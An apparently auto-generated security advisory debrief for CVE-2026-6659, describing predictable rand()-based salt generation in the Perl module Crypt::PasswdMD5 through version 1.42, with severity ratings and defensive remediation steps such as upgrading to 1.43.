PatchSiren cyber security CVE debrief
CVE-2026-6659 RSAVAGE CVE debrief
Crypt::PasswdMD5 versions through 1.42 for Perl generates insecure random values for salts using the built-in rand function, which is predictable and unsuitable for cryptographic purposes. The vulnerability stems from the module's reliance on Perl's non-cryptographic rand() for salt generation in password hashing operations, enabling attackers to predict salt values and potentially accelerate password cracking attacks against hashed passwords.
- Vendor
- RSAVAGE
- Product
- Crypt::PasswdMD5
- CVSS
- HIGH 7.5
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-08
- Original CVE updated
- 2026-05-26
- Advisory published
- 2026-05-08
- Advisory updated
- 2026-05-26
Who should care
Organizations using Perl-based authentication systems, system administrators managing legacy password storage, security teams assessing cryptographic implementations, and developers maintaining applications dependent on Crypt::PasswdMD5 for password hashing operations.
Technical summary
The Crypt::PasswdMD5 Perl module through version 1.42 uses Perl's built-in rand() function to generate salts for MD5-based password hashing. The rand() function is not cryptographically secure and produces predictable sequences, violating CWE-338 (Use of Cryptographically Weak PRNG). An attacker with knowledge of the random seed or through observation of generated salts can predict future salt values, enabling precomputation attacks and significantly reducing the effective security of password hashes. The vulnerability is classified as CVSS 3.1 HIGH severity (7.5) with network attack vector, low attack complexity, and no required privileges or user interaction. The confidentiality impact is rated HIGH while integrity and availability impacts are NONE.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade to Crypt::PasswdMD5 version 1.43 or later which replaces the insecure rand() implementation
- Audit systems for password hashes generated with affected versions and consider re-hashing with secure salt generation
- Review applications using Crypt::PasswdMD5 for password storage and verify salt uniqueness cannot be predicted
- Monitor for unusual authentication patterns that may indicate precomputed hash attacks
- If immediate upgrade is not possible, implement application-layer salt generation using cryptographically secure random sources before passing to Crypt::PasswdMD5
Evidence notes
The vulnerability was disclosed via oss-security mailing list on 2026-05-08. NVD records indicate the issue was modified on 2026-05-26. The affected code resides in the salt generation routine of Crypt::PasswdMD5.pm at lines 35-47 in version 1.42. A fix was committed and released in version 1.43.
Official resources
-
CVE-2026-6659 CVE record
CVE.org
-
CVE-2026-6659 NVD detail
NVD
-
Source item URL
nvd_modified
-
Source reference
9b29abf9-4ab0-4765-b253-1875cd9b441e
-
Source reference
9b29abf9-4ab0-4765-b253-1875cd9b441e
-
Source reference
9b29abf9-4ab0-4765-b253-1875cd9b441e
-
Source reference
9b29abf9-4ab0-4765-b253-1875cd9b441e
-
Source reference
af854a3a-2127-422b-91ae-364da2661108
2026-05-08T18:16:34.183Z